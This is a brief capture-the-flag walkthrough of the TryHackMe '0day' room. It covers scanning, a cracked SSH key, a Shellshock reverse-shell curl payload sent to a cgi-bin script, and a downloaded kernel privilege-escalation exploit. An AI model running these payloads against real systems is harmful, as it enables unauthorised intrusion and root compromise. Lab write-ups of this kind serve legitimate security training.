0day

Room Link: https://tryhackme.com/room/0day

Kali

nmap -A $VICTIM

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

Kali

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

This appeared to be a rabbit hole but I found a key and was able to bruteforce the password for it.

Kali

chmod 600 id_rsa
/opt/john/ssh2john.py id_rsa > id_john.txt
john --wordlist=/usr/share/wordlists/rockyou.txt id_john.txt

I found a cgi file. i tried checking if it was vulnerable to shellshock which wasn't working but it was vulnerable.

Kali

gobuster dir -u http://$VICTIM/cgi-bin/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt,cgi

Initial Shell

Link: https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/cgi

Kali#1

nc -lvnp 4242

Kali #2

curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/$KALI/4242 0>&1' http://$VICTIM/cgi-bin/test.cgi

Get autocomplete

python -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

Victim

uname -a

Kali

searchsploit 3.13.0
searchsploit -m linux/local/37292.c
gcc 37292.c -o exploit
python2 -m SimpleHTTPServer 81

The exploit didn't work as it's complaining that it can't create dynamic library

Victim

cd /tmp/
wget http://10.10.91.55:81/exploit
chmod +x exploit
./exploit

To fix this we just had to export the binpath from the machine

Victim

export PATH=/usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin
./exploit

Last updated 1 year ago